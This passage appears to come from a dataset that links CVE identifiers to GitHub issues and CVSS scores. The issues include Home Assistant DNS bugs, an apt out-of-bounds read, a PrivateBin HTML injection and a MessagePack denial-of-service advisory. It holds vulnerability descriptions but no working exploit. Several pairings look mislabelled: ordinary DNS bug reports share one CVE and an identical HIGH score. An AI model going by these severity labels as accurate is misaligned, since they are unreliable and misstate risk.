  60979. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  60980. "severity": "HIGH",
  60981. "baseScore": 7.5,
  60982. "impactScore": 3.6,
  60983. "exploitabilityScore": 3.9
  60984. },
  60985. {
  60986. "CVE_ID": "CVE-2020-36517",
  60987. "Issue_Url_old": "https://github.com/home-assistant/plugin-dns/issues/20",
  60988. "Issue_Url_new": "https://github.com/home-assistant/plugin-dns/issues/20",
  60989. "Repo_new": "home-assistant/plugin-dns",
  60990. "Issue_Created_At": "2020-12-26T11:35:40Z",
  60991. "description": "Not resolving local host names. In home assistant, if I use hostnames in FILETAG they fail to resolve (eg using platform snmp ). Using the corresponding IP addresses works, but is far from ideal and means I have to use fixed IP addresses and configuration becomes less unreadable and requires more maintenance. Trying to work out what is the root issue is, has led me to hassio dns seemingly not working as I would expect. The homeassistant docker container appears to be using APITAG for dns which is the hassio dns container. From within the homeassistant container this local hostname fails to resolve: dig APITAG and I can see from the dig output it is going out to the Internet to do the DNS lookup. But dig APITAG APITAG from home assistant does work (not surprisingly). The strange thing is from within the hassio dns container, fully qualified and unqualified local hostname lookups do work: dig APITAG dig pdu3 But dig APITAG APITAG does not work (unsurprisingly). What I would expect is that fully qualified and unqualified hostnames should resolve as I have set the search domain to APITAG and dns server to APITAG in APITAG I don't think this has ever worked with hassio dns.",
  60992. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  60993. "severity": "HIGH",
  60994. "baseScore": 7.5,
  60995. "impactScore": 3.6,
  60996. "exploitabilityScore": 3.9
  60997. },
  60998. {
  60999. "CVE_ID": "CVE-2020-36517",
  61000. "Issue_Url_old": "https://github.com/home-assistant/plugin-dns/issues/51",
  61001. "Issue_Url_new": "https://github.com/home-assistant/plugin-dns/issues/51",
  61002. "Repo_new": "home-assistant/plugin-dns",
  61003. "Issue_Created_At": "2021-07-11T20:22:04Z",
  61004. "description": "Dns stops resolving within hours/days. Ha is configured with a local dns resolver, while all other means of resolving are blocked on our home automation subnet. When (re)started, HA dns runs perfectly fine, and can resolve all queries through the assigned server. CODETAG After a few hours, the resolver just stops resolving through the programmed server. and switches to dot NUMBERTAG APITAG for all dns requests, which are all refused by the router ofcourse. Somehow HA jforgot, that APITAG is its assigned dns server. I'd like to add full dns logs, but 'ha dns logs' just gives me the last errors, and not the full logfile. If there's a way to give more info, let me know and I'll add the data.",
  61005. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  61006. "severity": "HIGH",
  61007. "baseScore": 7.5,
  61008. "impactScore": 3.6,
  61009. "exploitabilityScore": 3.9
  61010. },
  61011. {
  61012. "CVE_ID": "CVE-2020-36517",
  61013. "Issue_Url_old": "https://github.com/home-assistant/plugin-dns/issues/50",
  61014. "Issue_Url_new": "https://github.com/home-assistant/plugin-dns/issues/50",
  61015. "Repo_new": "home-assistant/plugin-dns",
  61016. "Issue_Created_At": "2021-06-30T12:07:56Z",
  61017. "description": "performance impact after dns update to APITAG Since dns upgrade to APITAG my complete hassio setup is having performance issues. I am running haos on Raspberry Pi NUMBERTAG B. It's an old pi, but before dns APITAG everything was running without issues and I had no reason to upgrade hardware. Since dns upgrade, coredns will eventually get stuck at more than NUMBERTAG CPU usage constantly and everything else slows down to the level that it's unusable. Even 'ha dns restart' is failing with time out. It's happening also with clean image install without configuring any integrations. When I downgrade to dns APITAG using 'ha dns update version APITAG CPU usage is back to normal and whole system is responsive. Downgrading dns is not permanent fix as it gets automatically updated back to last version and CPU load increases again. Is there an option to permanently downgrade to dns APITAG or disable APITAG completely (if TLS is causing too much load on rpi1)? dns logs using APITAG [INFO] APITAG NUMBERTAG NS IN . udp NUMBERTAG false NUMBERTAG NOERROR NUMBERTAG s [ERROR] plugin/errors NUMBERTAG NS: tls: APITAG timed out [INFO] APITAG NUMBERTAG NS IN . udp NUMBERTAG false NUMBERTAG NOERROR NUMBERTAG s [ERROR] plugin/errors NUMBERTAG NS: tls: APITAG timed out [INFO] APITAG NUMBERTAG NS IN . udp NUMBERTAG false NUMBERTAG NOERROR NUMBERTAG s [ERROR] plugin/errors NUMBERTAG NS: tls: APITAG timed out [INFO] APITAG NUMBERTAG NS IN . udp NUMBERTAG false NUMBERTAG NOERROR NUMBERTAG s [ERROR] plugin/errors NUMBERTAG NS: tls: APITAG timed out [INFO] APITAG NUMBERTAG NS IN . udp NUMBERTAG false NUMBERTAG NOERROR NUMBERTAG s [ERROR] plugin/errors NUMBERTAG NS: tls: APITAG timed out [INFO] APITAG NUMBERTAG NS IN . udp NUMBERTAG false NUMBERTAG NOERROR NUMBERTAG s [ERROR] plugin/errors NUMBERTAG NS: tls: APITAG timed out [INFO] APITAG NUMBERTAG NS IN . udp NUMBERTAG false NUMBERTAG NOERROR NUMBERTAG s [ERROR] plugin/errors NUMBERTAG NS: tls: APITAG timed out [INFO] APITAG NUMBERTAG NS IN . udp NUMBERTAG false NUMBERTAG NOERROR NUMBERTAG s [ERROR] plugin/errors NUMBERTAG NS: tls: APITAG timed out [INFO] APITAG NUMBERTAG NS IN . udp NUMBERTAG false NUMBERTAG NOERROR NUMBERTAG s [ERROR] plugin/errors NUMBERTAG NS: tls: APITAG timed out dns logs using APITAG (everything else the same, just downgraded dns): [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG in APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG in APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG in APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG in APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s [INFO] APITAG NUMBERTAG PTR IN NUMBERTAG APITAG APITAG udp NUMBERTAG false NUMBERTAG NXDOMAIN qr,aa,rd,ra NUMBERTAG s core NUMBERTAG supervisor APITAG Home Assistant OS NUMBERTAG CPU arm NUMBERTAG l",
  61018. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  61019. "severity": "HIGH",
  61020. "baseScore": 7.5,
  61021. "impactScore": 3.6,
  61022. "exploitabilityScore": 3.9
  61023. },
  61024. {
  61025. "CVE_ID": "CVE-2020-36517",
  61026. "Issue_Url_old": "https://github.com/home-assistant/plugin-dns/issues/70",
  61027. "Issue_Url_new": "https://github.com/home-assistant/plugin-dns/issues/70",
  61028. "Repo_new": "home-assistant/plugin-dns",
  61029. "Issue_Created_At": "2022-01-15T15:35:56Z",
  61030. "description": "Home Assistant OS leaks private host names to cloudflare DNS service. Describe the issue you are experiencing Home Assistant OS always gets configured to load balance between my DNS resolver and Cloudflare's. I already looked under every stone, but there's no way to disable this behavior using configuration options. So if I use DNS names configured by my router instead of hard coding IP addresses, HA will switch over to Cloudflare from time to time and leak my internal hostnames to their service. Of course resolution fails in this case, too. Note that this is not caused by the hard coded fallback option, but by the hard coded load balancing option. One way to avoid this could be blocking NUMBERTAG and NUMBERTAG in my firewall, but then HA's DNS resolver goes berserk flooding my firewall logs with multiple connection attempts per second. Also, this will break further whenever developers decide to switch their user base from Cloudflare to a new data collection service. What operating system image do you use? ova (for Virtual Machines) What version of Home Assistant Operating System is installed NUMBERTAG Did you upgrade the Operating System. Yes Steps to reproduce the issue NUMBERTAG Insert local hostname in HA config NUMBERTAG Notice recurring failures in name resolution NUMBERTAG Notice packets going to NUMBERTAG and NUMBERTAG Anything in the Supervisor logs that might be useful for us? APITAG Anything in the Host logs that might be useful for us? ERRORTAG System Health information _No response_ Additional information _No response_",
  61031. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  61032. "severity": "HIGH",
  61033. "baseScore": 7.5,
  61034. "impactScore": 3.6,
  61035. "exploitabilityScore": 3.9
  61036. },
  61037. {
  61038. "CVE_ID": "CVE-2020-36517",
  61039. "Issue_Url_old": "https://github.com/home-assistant/plugin-dns/issues/54",
  61040. "Issue_Url_new": "https://github.com/home-assistant/plugin-dns/issues/54",
  61041. "Repo_new": "home-assistant/plugin-dns",
  61042. "Issue_Created_At": "2021-08-25T19:14:14Z",
  61043. "description": ".local named devices (i.e. ESPHOME devices) only resolve for a few minutes after booting HA. APITAG devices show up being APITAG only a few minutes after booting the system. After that, they turn to APITAG although they are still online. mDNS resolving seems to breakdown within a few minutes after rebooting the OS. Running Home Assistant Operating System, which is, according to the site, the recommended installation method.",
  61044. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  61045. "severity": "HIGH",
  61046. "baseScore": 7.5,
  61047. "impactScore": 3.6,
  61048. "exploitabilityScore": 3.9
  61049. },
  61050. {
  61051. "CVE_ID": "CVE-2020-36518",
  61052. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2816",
  61053. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2816",
  61054. "Repo_new": "fasterxml/jackson-databind",
  61055. "Issue_Created_At": "2020-08-13T01:12:31Z",
  61056. "description": "Optimize ERRORTAG wrt recursion. Current implementation ERRORTAG is likely relatively expensive for deeply nested Object and Array values as it uses recursion even for \"vanilla\" case (one where there are no custom List /array or Map deserializers). It seems possible to rewrite this similar to what APITAG does. If this is not possible, should at least NUMBERTAG Test to see maximum nesting level that default JVM settings can handle (for my desktop, just to get an order of magnitude idea NUMBERTAG Possible define maximum recursion limit (for bonus points make configurable).",
  61057. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  61058. "severity": "HIGH",
  61059. "baseScore": 7.5,
  61060. "impactScore": 3.6,
  61061. "exploitabilityScore": 3.9
  61062. },
  61063. {
  61064. "CVE_ID": "CVE-2020-3810",
  61065. "Issue_Url_old": "https://github.com/Debian/apt/issues/111",
  61066. "Issue_Url_new": "https://github.com/debian/apt/issues/111",
  61067. "Repo_new": "Debian/apt",
  61068. "Issue_Created_At": "2020-05-11T03:15:00Z",
  61069. "description": "An out of bounds bug occurs in the APITAG function. An out of bounds bug occurs in the APITAG function from very early version NUMBERTAG An abnormally formatted .deb file may cause the function APITAG to access memory out of bounds at APITAG . The steps and files of reproducing the bug are as follows: ERRORTAG Line NUMBERTAG of APITAG is APITAG , which checkes the value of APITAG , if it is APITAG or APITAG , then minus I by NUMBERTAG For the value of APITAG is just spaces, the unsigned int variable I minus itself to APITAG , causing an out of bounds memroy access and testdeb crashing. For apt is used by milions of users, it is needed to make sure it checks error when bad deb file given. Adding detection of variable values is a straightforward fix. ERRORTAG Do you need to strengthen the file format check in other places? Thanks for you attention. FILETAG",
  61070. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  61071. "severity": "MEDIUM",
  61072. "baseScore": 5.5,
  61073. "impactScore": 3.6,
  61074. "exploitabilityScore": 1.8
  61075. },
  61076. {
  61077. "CVE_ID": "CVE-2020-4043",
  61078. "Issue_Url_old": "https://github.com/phpMussel/phpMussel/issues/167",
  61079. "Issue_Url_new": "https://github.com/phpmussel/phpmussel/issues/167",
  61080. "Repo_new": "phpmussel/phpmussel",
  61081. "Issue_Created_At": "2018-08-23T19:12:13Z",
  61082. "description": "Phar unserialization vulnerability.. An unserialization vulnerability was recently discovered which affects the phar wrapper. Due to that APITAG implements the phar wrapper for reading archives, this vulnerability also currently affects all currently supported versions of APITAG to the extent of its ability to read archives. I would __ strongly __ recommend that all APITAG users __ disable archive checking __ in APITAG until further notice. This can be achieved by setting APITAG to false in the APITAG configuration (at which point, APITAG would be unable to scan the content of archives, but would also be protected from this vulnerability). Currently planning exactly how to resolve this problem for APITAG but it'll most likely involve a complete overhaul of how APITAG handles archives, and involve completely ditching the phar wrapper in favour of something else. Anyway, I'll reply here with any relevant updates that happen, new information, etc, and announce here when the problem is resolved.",
  61083. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  61084. "severity": "CRITICAL",
  61085. "baseScore": 9.8,
  61086. "impactScore": 5.9,
  61087. "exploitabilityScore": 3.9
  61088. },
  61089. {
  61090. "CVE_ID": "CVE-2020-4067",
  61091. "Issue_Url_old": "https://github.com/coturn/coturn/issues/583",
  61092. "Issue_Url_new": "https://github.com/coturn/coturn/issues/583",
  61093. "Repo_new": "coturn/coturn",
  61094. "Issue_Created_At": "2020-06-17T10:12:53Z",
  61095. "description": "Reporting a security issue (placeholder). Hi, I would like to report a (potentially exploitable) security issue in coturn, but I am not sure what the expected process is and if you desire to discuss this issue confidentially until it is resolved. Regarding the criticality/impact: I am not completely sure, what the impact is, but I can imagine that this can be practically exploited depending on the exact scenario where coturn is used in. In summary, I'd really like to have this issue resolved. Could you please give me guidance on how to proceed?",
  61096. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  61097. "severity": "HIGH",
  61098. "baseScore": 7.5,
  61099. "impactScore": 3.6,
  61100. "exploitabilityScore": 3.9
  61101. },
  61102. {
  61103. "CVE_ID": "CVE-2020-4068",
  61104. "Issue_Url_old": "https://github.com/kylebrowning/APNSwift/issues/31",
  61105. "Issue_Url_new": "https://github.com/swift-server-community/apnswift/issues/31",
  61106. "Repo_new": "swift-server-community/apnswift",
  61107. "Issue_Created_At": "2019-07-22T13:01:29Z",
  61108. "description": "address sanitizer failure. Describe the bug This looks like quite a serious bug, the test suite is failing address sanitizer: ERRORTAG To Reproduce Steps to reproduce the behavior NUMBERTAG run tests with APITAG Expected behavior passes OS: APITAG Catalina FILETAG",
  61109. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  61110. "severity": "CRITICAL",
  61111. "baseScore": 9.8,
  61112. "impactScore": 5.9,
  61113. "exploitabilityScore": 3.9
  61114. },
  61115. {
  61116. "CVE_ID": "CVE-2020-5217",
  61117. "Issue_Url_old": "https://github.com/twitter/secure_headers/issues/418",
  61118. "Issue_Url_new": "https://github.com/github/secure_headers/issues/418",
  61119. "Repo_new": "github/secure_headers",
  61120. "Issue_Created_At": "2020-01-21T16:25:57Z",
  61121. "description": "Filtering CSP entries to prevent bypassing rules. Consider the following Rails controller action which overwrites the frame ancestors based on some user input: CODETAG This results into the following response header: APITAG This shows unexpected output, because by setting the frame ancestors the user is able to change the APITAG opening possibilities for XSS. One solution to this would be to filter out the CSP rules inside of specific CSP rules: APITAG",
  61122. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N",
  61123. "severity": "MEDIUM",
  61124. "baseScore": 5.8,
  61125. "impactScore": 1.4,
  61126. "exploitabilityScore": 3.9
  61127. },
  61128. {
  61129. "CVE_ID": "CVE-2020-5223",
  61130. "Issue_Url_old": "https://github.com/PrivateBin/PrivateBin/issues/554",
  61131. "Issue_Url_new": "https://github.com/privatebin/privatebin/issues/554",
  61132. "Repo_new": "privatebin/privatebin",
  61133. "Issue_Created_At": "2019-12-25T08:12:19Z",
  61134. "description": "HTML injection via unescaped attachment filename. I investigated the error condition found in the property based unit test URLTAG with RNG state NUMBERTAG b8f0d4ec2a NUMBERTAG b5 URLTAG for the APITAG class in an unrelated change. The error occurs in the APITAG method, were we can provide a string that will have the filename inserted in place of any APITAG in that string and which then becomes the text node of the link to download the attachment. The error condition that jsverify found was when it generated a prefix APITAG for that label (so the label generated in that test case became APITAG ). Since we insert that label untouched, it attempts to set another link into text node of a link, which isn't allowed in HTML and in the jsdom based environment gets silently ignored Hence the test failed only for APITAG tags, as other tags are allowed inside a link. While the label itself is from a trusted source (hardcoded in the translation files and APITAG the filename that is injected isn't. If one would create a paste with attachment with a name containing HTML code (that can be easily done using one of the CLI clients), that paste would have that snippet injected when the paste is displayed. I have prepared a patch and updated unit test case that does the HTML entity encoding to address this and will push this ASAP. While file uploads are disabled by default, I would still suggest that we publish a release with this fix. Your opinions?",
  61135. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N",
  61136. "severity": "MEDIUM",
  61137. "baseScore": 4.4,
  61138. "impactScore": 2.7,
  61139. "exploitabilityScore": 1.3
  61140. },
  61141. {
  61142. "CVE_ID": "CVE-2020-5234",
  61143. "Issue_Url_old": "https://github.com/neuecc/MessagePack-CSharp/issues/810",
  61144. "Issue_Url_new": "https://github.com/neuecc/messagepack-csharp/issues/810",
  61145. "Repo_new": "neuecc/messagepack-csharp",
  61146. "Issue_Created_At": "2020-02-07T23:25:01Z",
  61147. "description": "APITAG returns null on copied instances. When a APITAG instance is mutated, the copy constructor doesn't initialize its APITAG field, leading to future calls to APITAG to return null. What's particularly hazardous about this is that null is interpreted by APITAG to mean \"default comparer\" so it defeats the hash collision resistant fixes we made recently.",
  61148. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  61149. "severity": "MEDIUM",
  61150. "baseScore": 6.5,
  61151. "impactScore": 3.6,
  61152. "exploitabilityScore": 2.8
  61153. },
  61154. {
  61155. "CVE_ID": "CVE-2020-5234",
  61156. "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/405",
  61157. "Issue_Url_new": "https://github.com/aspnet/announcements/issues/405",
  61158. "Repo_new": "aspnet/announcements",
  61159. "Issue_Created_At": "2020-01-31T17:10:21Z",
  61160. "description": "Microsoft Security Advisory | APITAG Denial of Service. Microsoft Security Advisory | APITAG Denial of Service APITAG APITAG Executive summary This advisory is being published in response to a recent security advisory for the APITAG APITAG package URLTAG . Since ASP.NET Core APITAG users may be using this package, we want to bring this issue to the attention of all ASP.NET Core users. Microsoft is releasing this security advisory to provide information about a vulnerability that affects ASP.NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A denial of service vulnerability exists when using the APITAG URLTAG APITAG package. An attacker who successfully exploited this vulnerability could cause a denial of service against an ASP.NET Core application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the ASP.NET Core application. The update addresses the vulnerability by correcting how APITAG handles deserialization. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected runtime or your application has a dependency on any of the packages listed in affected packages affected packages , you are exposed to the vulnerability. APITAG APITAG Affected software Any .NET Core NUMBERTAG or NUMBERTAG application using APITAG with the APITAG Hub Protocol. APITAG APITAG Affected packages Any ASP.NET Core based application that uses any of the vulnerable packages shown below, or any ASP.NET Core application running on .NET Core NUMBERTAG or NUMBERTAG Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG With code change described below APITAG NUMBERTAG Update transitive reference to APITAG NOTE: APITAG NUMBERTAG is not compatible with ASP.NET Core APITAG APITAG APITAG How do I fix the issue? First examine the packages you have installed. If you have a vulnerable version of APITAG in your package graph, you must update it. If you have a reference to APITAG in your project, you likely have a vulnerable version of APITAG and should fix it by directly referencing a secure version fixing transitive dependencies . In addition to updating you must set the APITAG static property to enable the ERRORTAG mode for the APITAG serializer, to ensure you are protected. See the APITAG advisory URLTAG for details. Add the following code to the top of your app's entry point: ERRORTAG If your application provides any custom APITAG implementations, you should also update them to include the relevant security measures by ensuring reads of variable length values (such as strings) are done within a APITAG block. See the APITAG advisory URLTAG for more details. Direct dependencies Direct dependencies are discoverable by examining your csproj file. They can be fixed by editing the project file fixing direct dependencies or using APITAG to update the dependency. Transitive dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if Contoso publishes a package APITAG that, in turn, depends on APITAG and you add the APITAG package to your project now your project has a direct dependency on APITAG and, because APITAG depends APITAG your application gains a transitive dependency on the APITAG package. Transitive dependencies are reviewable in two ways: In the Visual Studio Solution Explorer window, which supports searching. By examining the APITAG file contained in the obj directory of your project for csproj based projects The APITAG files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer vs solution explorer , or you can review the APITAG file project assets json) . APITAG APITAG Using Visual Studio Solution Explorer To use Solution Explorer, open the project in Visual Studio, and then press Ctrl+; to activate the search in Solution Explorer. Search for the vulnerable package affected software and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a package that takes a dependency on APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In the previous results, you can see that a reference to APITAG version NUMBERTAG is discovered. Under the Dependencies node is a APITAG node. Under the APITAG node is the list of packages you have directly taken a dependency on and their versions. In screenshot, the application takes a direct dependency on APITAG . APITAG in turn has leaf nodes that list its dependencies and their versions. The APITAG package takes a dependency on a version of APITAG , that in turn takes a dependency on a version of APITAG . APITAG APITAG Manually reviewing FILETAG Open the FILETAG file from your project\u2019s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file. Visual Studio and Visual Studio Code provide JSON friendly editing. Search the FILETAG file for the vulnerable package affected software , using the format APITAG for each of the package names from the preceding table. If you find the assembly name in your search: v Examine the line on which they are found, the version number is after the APITAG . Compare to the vulnerable versions table affected software . For example, a search result that shows APITAG is a reference to version NUMBERTAG of APITAG . If your FILETAG file includes references to the vulnerable package affected software , then you need to fix the transitive dependencies. If you have not found any reference to any vulnerable packages, this means either None of your direct dependencies depend on any vulnerable packages, or You have already fixed the problem by updating the direct dependencies. APITAG APITAG Fixing Dependencies APITAG APITAG Fixing direct dependencies Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG elements. The following shows an example project file: CODETAG The preceding example has a reference to the vulnerable package affected software , as seen by the single APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. The previous example shows a single direct dependency on APITAG version NUMBERTAG To update the version to the secure package, change the version number to the updated package version as listed on the table previously affected software . In this example, update APITAG to the appropriate fixed package number affected software for your major version. Save the csproj file. The example csproj now looks as follows: CODETAG If you're using Visual Studio and you save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the updated dependencies. Now recompile your application. If after recompilation you see a Dependency conflict warning , you must update your other direct dependencies to versions that take a dependency on the updated package. APITAG APITAG Fixing transitive dependencies If your transitive dependency review found references to the vulnerable package affected software , you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG nodes, for example: CODETAG You must add a direct dependency to the updated version of the vulnerable package affected software by adding it to the csproj file. You do this by adding a new line to the dependencies section, referencing the fixed version. For example, if your search showed a transitive reference to a vulnerable APITAG version, you'd add a reference to the fixed package number affected software . CODETAG After you've added the direct dependency reference, save your csproj file. If you're using Visual Studio, save your updated csproj file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependencies. Finally, you must rebuild your application, test, and redeploy. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Acknowledgments Levi Broderick and Andrew Arnott of Microsoft Corporation External Links Security Advisory from the APITAG package authors URLTAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  61161. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  61162. "severity": "MEDIUM",
  61163. "baseScore": 6.5,
  61164. "impactScore": 3.6,
  61165. "exploitabilityScore": 2.8
  61166. },
  61167. {
  61168. "CVE_ID": "CVE-2020-5239",
  61169. "Issue_Url_old": "https://github.com/Mailu/Mailu/issues/1354",
  61170. "Issue_Url_new": "https://github.com/mailu/mailu/issues/1354",
  61171. "Repo_new": "mailu/mailu",
  61172. "Issue_Created_At": "2020-02-08T09:30:20Z",
  61173. "description": "WARNING Fetchmail security update to all branches, update ASAP. On NUMBERTAG we discovered a bug in the Fetchmail script for Mailu that has serious security consequences. If you are using the fetchmail container for Mailu (which is optional), please apply the following instructions as soon as possible. If you know any Mailu administrator, please spread the word. Instructions NUMBERTAG Before anything else, make sure that you can access your container logs, and create a backup if you are using the default logging driver, as update may overwrite these logs and make post analysis more difficult NUMBERTAG Then apply one of the following mitigations. A. If running on NUMBERTAG or master, update the fetchmail container : docker compose pull fetchmail; docker compose up d B. If running on another version, upgrade at least to NUMBERTAG if possilbe to NUMBERTAG C. In case you need time before updating the container or upgrading Mailu, disable the fetchmail service : docker compose stop fetchmail (then comment out the fetchmail section from the compose file to avoid any later mistake NUMBERTAG If you suspect any exploitation might have taken place, bring down Mailu, modify the APITAG with a new NUMBERTAG bytes random value, then bring Mailu back up. Change your password for every fetched account configured on your Mailu instance NUMBERTAG Inspect your logs and database for any application tokens that might be illegitimate or recently modified accounts that could indicate an illegitimate password change (which could both be consequences of a successful exploit). Take action accordingly, and feel free to ask any question on the discussion thread. Timeline NUMBERTAG ulnerability reported and confirmed NUMBERTAG patch published to branches NUMBERTAG to master, advisory published Details The vulnerability requires authenticated access for exploitation, so patching is even more urgent if you have open registrations or untrusted users on your Mailu server. We will update this post in the next few days with details about the discovery, analysis and fix for this vulnerability. We will possibly request a CVE identifier for this, given the serious impact, so that visibility is maximum and Mailu administrators upgrade quickly. The current estimated CVSS is over NUMBERTAG We will also provide plausible exploitation markers (additional to instructions in steps NUMBERTAG although we did not find anything suspicious on any of three Mailu instances we manage that have open registration.",
  61174. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  61175. "severity": "HIGH",
  61176. "baseScore": 8.8,
  61177. "impactScore": 5.9,
  61178. "exploitabilityScore": 2.8
  61179. },
  61180. {
  61181. "CVE_ID": "CVE-2020-5283",
  61182. "Issue_Url_old": "https://github.com/viewvc/viewvc/issues/211",
  61183. "Issue_Url_new": "https://github.com/viewvc/viewvc/issues/211",
  61184. "Repo_new": "viewvc/viewvc",
  61185. "Issue_Created_At": "2020-03-26T18:08:02Z",
